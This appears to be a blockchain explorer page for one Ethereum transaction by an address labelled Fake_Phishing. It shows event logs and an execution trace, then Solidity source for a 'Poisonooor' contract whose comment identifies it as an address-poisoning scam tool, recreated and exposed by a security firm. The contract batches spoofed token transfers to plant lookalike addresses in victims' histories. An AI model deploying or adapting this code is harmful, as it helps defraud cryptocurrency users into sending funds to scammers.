Transaction Hash:
Block:
22854033 at Jul-05-2025 03:52:59 PM +UTC
Transaction Fee:
0.00004717510702732 ETH
$0.12
Gas Used:
88,552 Gas / 0.532739035 Gwei
Emitted Events:
326 |
0xa5a687485a3f24c371a89142d11524853238e92c.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000e5ed4ccc01b52cd7dd6c09c188c36809ee4c6284, 0x000000000000000000000000adcb8727e8a318a3dad6fcf33f472e931a14cb8e, 000000000000000000000000000000000000000000000000000000057bb07b80 )
|
327 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000adcb8727e8a318a3dad6fcf33f472e931a14cb8e, 0x000000000000000000000000a5a687485a3f24c371a89142d11524853238e92c, 000000000000000000000000000000000000000000000000000000057bb07b80 )
|
328 |
0x291c5ef867b237f7499f4b17e199414b339a1547.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000d2bdc45bb64f6ba666d530237c57880be6bf4282, 0x000000000000000000000000c8e9d5b25df003f7f6f384bd9a3065330fa79a7e, 000000000000000000000000000000000000000000000000004a3d74b08b01da )
|
329 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000c8e9d5b25df003f7f6f384bd9a3065330fa79a7e, 0x000000000000000000000000291c5ef867b237f7499f4b17e199414b339a1547, 000000000000000000000000000000000000000000000000004a3d74b08b01da )
|
330 |
0xc5f7ae871ab4cff5a973cc59a5aa39a1ceec5648.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x00000000000000000000000048bef601cdda7b9cb312fe9fe47ff8df2b243b57, 0x000000000000000000000000c2f4a209421d581ab9fbd79ca6f12b7d2fc564aa, 0000000000000000000000000000000000000000000000000000002b39bc8590 )
|
331 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000c2f4a209421d581ab9fbd79ca6f12b7d2fc564aa, 0x000000000000000000000000c5f7ae871ab4cff5a973cc59a5aa39a1ceec5648, 0000000000000000000000000000000000000000000000000000002b39bc8590 )
|
332 |
0x279200d4e4618d953c1e05f929bc71a21477b3d0.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000b53cf0c414c4a46797179bb72a214d9720a06ac7, 0x0000000000000000000000007fa8920636afb86a8859661ba3b753f8f24445c5, 00000000000000000000000000000000000000000000000340aad21b3b700000 )
|
333 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000007fa8920636afb86a8859661ba3b753f8f24445c5, 0x000000000000000000000000279200d4e4618d953c1e05f929bc71a21477b3d0, 00000000000000000000000000000000000000000000000340aad21b3b700000 )
|
334 |
0xa108bce3a4f6f5303daa9922af6d07f7588907ff.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000a615fee4dab18515b7d92f8a8e84105634b673fb, 0x0000000000000000000000000e0ec18366625cac5db2d4ae46c4ab040b669f4a, 000000000000000000000000000000000000000000000026914cdc10f0334000 )
|
335 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000000e0ec18366625cac5db2d4ae46c4ab040b669f4a, 0x000000000000000000000000a108bce3a4f6f5303daa9922af6d07f7588907ff, 000000000000000000000000000000000000000000000026914cdc10f0334000 )
|
336 |
0xa108bce3a4f6f5303daa9922af6d07f7588907ff.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000953ab307b47c0ade4d2601bf09c47583bfaf55ab, 0x0000000000000000000000007bea7c4e3f2ad1eaf7db4d6b48e66cfc10345139, 000000000000000000000000000000000000000000000425535a656df4c413f8 )
|
337 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000007bea7c4e3f2ad1eaf7db4d6b48e66cfc10345139, 0x000000000000000000000000a108bce3a4f6f5303daa9922af6d07f7588907ff, 000000000000000000000000000000000000000000000425535a656df4c413f8 )
|
338 |
0xae4cda11de9d5d1d28c437f63c88e52c2a0d47de.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x0000000000000000000000003a9b50f1f736b625f9706cbd6145fd8e1a7fed82, 0x000000000000000000000000e3474d9e79f00058e30bd10843879f08d88c1964, 00000000000000000000000000000000000000000000000000009b9c308178e7 )
|
339 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000e3474d9e79f00058e30bd10843879f08d88c1964, 0x000000000000000000000000ae4cda11de9d5d1d28c437f63c88e52c2a0d47de, 00000000000000000000000000000000000000000000000000009b9c308178e7 )
|
Account State Difference:
Address | Before | After | State Difference | ||
---|---|---|---|---|---|
0xc46908F8...2A9c38F0d | (Fake_Phishing1232746) |
0.399760735223201808 Eth
Nonce: 43453
|
0.399713560116174488 Eth
Nonce: 43454
| 0.00004717510702732 | |
0xdadB0d80...24f783711
Miner
| (BuilderNet) | 29.340291759006441863 Eth | 29.340296186606441863 Eth | 0.0000044276 |
Execution Trace
Poisonooor.transfer( 0x0000000000000000000000000000000000000020, 32 ) => ( True )
Poisonooor.attemptTransfer( token=0xa5a687485A3F24c371A89142D11524853238e92C, from=0xe5ed4ccC01b52CD7dd6c09c188C36809EE4c6284, to=0xadCB8727e8a318a3daD6FcF33f472e931a14Cb8E, amount=23550000000 )
-
Fake_Phishing1259782.23b872dd( )
-
Poisonooor.attemptTransfer( token=0x291c5Ef867B237f7499f4B17e199414B339A1547, from=0xD2bDC45bB64f6bA666D530237c57880Be6BF4282, to=0xc8e9d5b25Df003F7F6f384bD9a3065330Fa79A7e, amount=20896719663989210 )
-
Fake_Phishing1258374.23b872dd( )
-
Poisonooor.attemptTransfer( token=0xC5f7aE871AB4cff5A973CC59A5Aa39A1CEeC5648, from=0x48BEf601cDdA7B9cB312Fe9FE47fF8df2b243b57, to=0xC2F4A209421D581aB9fBD79CA6F12b7D2fc564aA, amount=185652250000 )
-
Fake_Phishing1259783.23b872dd( )
-
Poisonooor.attemptTransfer( token=0x279200d4E4618d953C1e05f929BC71A21477B3D0, from=0xB53Cf0c414c4a46797179BB72A214d9720a06ac7, to=0x7fa8920636afB86a8859661bA3B753f8f24445C5, amount=60000000000000000000 )
-
Fake_Phishing1258361.23b872dd( )
-
Poisonooor.attemptTransfer( token=0xa108bcE3a4F6f5303daa9922AF6d07f7588907fF, from=0xa615FEe4dab18515b7d92f8a8E84105634b673fb, to=0x0e0EC18366625cAc5dB2D4AE46C4ab040b669F4A, amount=711446260000000000000 )
-
Fake_Phishing1258364.23b872dd( )
-
Poisonooor.attemptTransfer( token=0xa108bcE3a4F6f5303daa9922AF6d07f7588907fF, from=0x953Ab307b47c0ADE4D2601Bf09c47583BfAf55AB, to=0x7BEa7c4e3f2ad1eaf7dB4D6b48E66cFC10345139, amount=19578001686781818573816 )
-
Fake_Phishing1258364.23b872dd( )
-
Poisonooor.attemptTransfer( token=0xae4cda11De9d5D1d28c437F63c88E52c2A0D47dE, from=0x3A9b50f1f736B625f9706Cbd6145FD8E1A7FEd82, to=0xE3474D9e79f00058E30bD10843879f08D88c1964, amount=171095130994919 )
-
Fake_Phishing1258368.23b872dd( )
-
pragma solidity 0.8.26; interface IERC20 { function transfer(address to, uint256 value) external returns (bool); function transferFrom(address from, address to, uint256 value) external returns (bool); function balanceOf(address account) external view returns (uint256); } contract Poisonooor { /* This contract is used by bad guys for the address poisoning scam to trick inattentive users into sending USDT/USDC to the wrong addresses Recreated and exposed by Wintermute DESCRIPTION OF HOW THIS SCAM WORKS: https://www.blockaid.io/blog/a-deep-dive-into-address-poisoning */ using SafeERC20 for IERC20; mapping(address => mapping(address => uint256)) public mapping_4850931766; event Transferred(bytes32 indexed, address indexed, address indexed, uint256) anonymous; receive() external payable {} fallback() external payable { require(msg.value == 0, "Ether not accepted"); transfer(address(0), 0); } function attemptTransfer(IERC20 token, address from, address to, uint256 amount) external { token.safeTransferFrom(from, to, amount); } function transfer(address, uint256) public returns (bool) { uint256 len = msg.data.length; require((len - 68) % 128 == 0, "Invalid call data length"); uint256 iters = (len - 68) / 128; for (uint256 i = 0; i < iters; i++) { uint256 offset = 68 + i * 128; address from; address to; address token; uint256 amount; assembly { from := calldataload(offset) to := calldataload(add(offset, 32)) token := calldataload(add(offset, 64)) amount := calldataload(add(offset, 96)) } try this.attemptTransfer(IERC20(from), to, token, amount) { emit Transferred(hex"c1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db", token, from, amount); } catch { mapping_4850931766[token][from] += amount; } } return true; } } library SafeERC20 { error SafeERC20FailedOperation(address token); function safeTransferFrom(IERC20 token, address from, address to, uint256 value) internal { _callOptionalReturn(token, abi.encodeCall(token.transferFrom, (from, to, value))); } function _callOptionalReturn(IERC20 token, bytes memory data) private { uint256 returnSize; uint256 returnValue; assembly ("memory-safe") { let success := call(gas(), token, 0, add(data, 0x20), mload(data), 0, 0x20) if iszero(success) { let ptr := mload(0x40) returndatacopy(ptr, 0, returndatasize()) revert(ptr, returndatasize()) } returnSize := returndatasize() returnValue := mload(0) } if (returnSize == 0 ? address(token).code.length == 0 : returnValue != 1) { revert SafeERC20FailedOperation(address(token)); } } }